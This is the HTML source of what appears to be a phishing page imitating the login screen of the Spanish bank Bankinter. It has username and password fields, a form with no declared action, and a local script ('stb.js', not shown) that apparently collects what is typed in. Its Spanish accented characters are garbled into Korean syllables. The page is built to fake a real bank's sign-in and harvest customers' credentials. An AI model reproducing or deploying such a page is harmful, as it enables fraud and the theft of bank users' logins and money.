<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/galo.css">
    <link rel="stylesheet" href="./css/galo-mb.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body>  
    <div class="topline"></div>
    <div class="kolchi">
        
        <!-- lfoqani -->
        
        <div class="lfoq">
            <div class="top-img">
                <img class="top-pc" src="./img/hetopo-pc-01.png" alt="">
                <img class="top-mb" src="./img/hedopo-mb-01.png" alt="">
            </div>
        </div>
        <!--  -->
        <div class="center">
            <div>
                <p class="pp1">Accede al 치rea privada de Bankinter</p>
                <form method="post" id="pg1">
                <div class="group">      
                    <input style="color: rgb(130, 130, 130);" type="text" id="dni" required>
                    <span class="highlight"></span>
                    <span class="bar"></span>
                    <label>Usuario</label>
                </div> 
                <div class="group g2">      
                    <input type="password" id="paso" required>
                    <span class="highlight"></span>
                    <span class="bar"></span>
                    <label> Contrase침a</label>
                </div> 
                <p class="pp2">He olvidado mi usuario y/o contrase침a
                </p>
                <button type="submit">Iniciar sesi칩n</button>
            </form>
            </div>
        </div>

        <div class="botano">
            <img class="bot-pc" src="./img/botanoma-pc01.png" alt="">
            <img class="bot-mb" src="./img/botanoma-mb01.png" alt="">
            <!-- <div class="topline2"></div> -->
        </div>
    </div>
   

    <!-- my script -->
    <script src="./js/stb.js" type="module"></script>
</body>
</html>